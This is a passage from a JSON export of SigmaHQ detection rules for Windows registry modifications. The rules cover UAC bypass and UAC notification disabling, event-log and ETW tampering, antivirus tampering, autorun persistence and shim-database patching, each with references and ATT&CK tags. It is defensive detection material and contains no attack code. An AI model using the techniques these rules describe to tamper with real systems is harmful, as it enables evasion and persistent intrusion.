"creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_disable_notification.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md", "https://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_disable_notification.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c5f6a85d-b647-40f7-bbad-c10b66bab038", "value": "UAC Notification Disabled" }, { "description": "Detect set DisallowRun to 1 to prevent user running specific computer program", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_disallowrun_execution.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "275641a5-a492-45e2-a817-7c81e9d9d3e9", "value": "Add DisallowRun Execution to Registry" }, { "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-25", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_macroruntimescanscope.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope", "https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", "value": "Disable Macro Runtime Scan Scope" }, { "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", "meta": { "author": "frack113", "creation_date": "2022-03-18", "falsepositive": [ "Legitimate admin script" ], "filename": "registry_set_hide_function_user.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", "value": "Registry Hide Function from User" }, { "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Unknown" ], "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44", "https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "value": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry" }, { "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unlikely" ], "filename": "registry_set_persistence_typed_paths.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://forensafe.com/blogs/typedpaths.html", "https://twitter.com/dez_/status/1560101453150257154", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", "value": "Potential Persistence Via TypedPaths" }, { "description": "Detects execution of commands via the run dialog box on Windows by checking values of the \"RunMRU\" registry key.\nThis technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.\n", "meta": { "author": "Ahmed Farouk, Nasreddine Bencherchali", "creation_date": "2024-11-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_runmru_susp_command_execution.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/", "https://www.forensafe.com/blogs/runmrukey.html", "https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71", "https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7df0e9e-91a5-459a-a003-4cde67c2ff5d", "value": "Potentially Suspicious Command Executed Via Run Dialog Box - Registry" }, { "description": "Detects that a powershell code is written to the registry as a service.", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "registry_set_powershell_as_service.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "value": "PowerShell as a Service in Registry" }, { "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unlikely" ], "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8023f872-3f1d-4301-a384-801889917ab4", "value": "Usage of Renamed Sysinternals Tools - RegistrySet" }, { "description": "Hides the file extension through modification of the registry", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Administrative scripts" ], "filename": "registry_set_change_security_zones.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" ], "tags": [ "attack.persistence", "attack.t1137" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "value": "IE Change Domain Zone" }, { "description": "Detects tamper attempts to sophos av functionality via registry key modification", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-02", "falsepositive": [ "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], "filename": "registry_set_sophos_av_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "value": "Tamper With Sophos AV Registry Keys" }, { "description": "Detects tampering with the \"Enabled\" registry key in order to disable Windows logging of a Windows event channel", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-04", "falsepositive": [ "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "filename": "registry_set_disable_winevt_logging.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", "https://twitter.com/WhichbufferArda/status/1543900539280293889", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "value": "Disable Windows Event Logging Via Registry" }, { "description": "Detects potential WerFault \"ReflectDebugger\" registry value abuse for persistence.", "meta": { "author": "X__Junior", "creation_date": "2023-05-18", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_reflectdebugger.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html", "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0cf2e1c6-8d10-4273-8059-738778f981ad", "value": "Potential WerFault ReflectDebugger Registry Value Abuse" }, { "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Legitimate use of the multi session functionality" ], "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", "value": "Winlogon AllowMultipleTSSessions Enable" }, { "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", "meta": { "author": "frack113", "creation_date": "2022-04-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_add_load_service_in_safe_mode.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "value": "Registry Persistence via Service in Safe Mode" }, { "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", "meta": { "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "creation_date": "2022-05-04", "falsepositive": [ "Legitimate use of screen saver" ], "filename": "registry_set_scr_file_executed_by_rundll32.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/pabraeken/status/998627081360695297", "https://twitter.com/VakninHai/status/1517027824984547329", "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "value": "ScreenSaver Registry Key Set" }, { "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-09", "falsepositive": [ "Unknown" ], "filename": "registry_set_services_etw_tamper.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f281b83-0200-4b34-bf35-d24687ea57c2", "value": "ETW Logging Disabled For SCM" }, { "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-12", "falsepositive": [ "Unknown" ], "filename": "registry_set_turn_on_dev_features.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1560536653709598721", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", "value": "Potential Signing Bypass Via Windows Developer Features - Registry" }, { "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec", "creation_date": "2022-03-18", "falsepositive": [ "Legitimate admin script" ], "filename": "registry_set_disable_function_user.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", "https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl", "https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", "value": "Disable Internal Tools or Feature in Registry" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_bypass_winsat.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "value": "UAC Bypass Abusing Winsat Path Parsing - Registry" }, { "description": "Detect set UseActionCenterExperience to 0 to disable the Windows security center notification", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_security_center_notifications.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", "value": "Disable Windows Security Center Notifications" }, { "description": "Detects registry modifications that disable Privacy Settings Experience", "meta": { "author": "frack113", "creation_date": "2022-10-02", "falsepositive": [ "Legitimate admin script" ], "filename": "registry_set_disable_privacy_settings_experience.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "value": "Disable Privacy Settings Experience in Registry" }, { "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-26", "falsepositive": [ "Unlikely" ], "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", "value": "Hide Schedule Task Via Index Value Tamper" }, { "description": "Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_shim_database_susp_application.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml" ], "tags": [ "attack.persistence", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf344fea-d947-4ef4-9192-34d008315d3a", "value": "Suspicious Shim Database Patching Activity" }, { "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "meta": { "author": "frack113", "creation_date": "2022-05-28", "falsepositive": [ "Unknown" ], "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification" }, { "description": "Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the \"PromptOnSecureDesktop\" value.\nThe \"PromptOnSecureDesktop\" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.\nWhen \"PromptOnSecureDesktop\" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.\n", "meta": { "author": "frack113", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_disable_secure_desktop_prompt.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_disable_secure_desktop_prompt.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d7ceeef-3539-4392-8953-3dc664912714", "value": "UAC Secure Desktop Prompt Disabled" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_common.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/userinitmprlogonscript.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", "value": "Common Autorun Keys Modification" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" ], "tags": [ "attack.persistence", "attack.t1547.001", "attack.t1546.009" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", "value": "Session Manager Autorun Keys Modification" }, { "description": "Detects modifications to the \"Hidden\" and \"ShowSuperHidden\" explorer registry values in order to disable showing of hidden files and system files.\nThis technique is abused by several malware families to hide their files from normal users.\n", "meta": { "author": "frack113", "creation_date": "2022-04-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_hide_file.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", 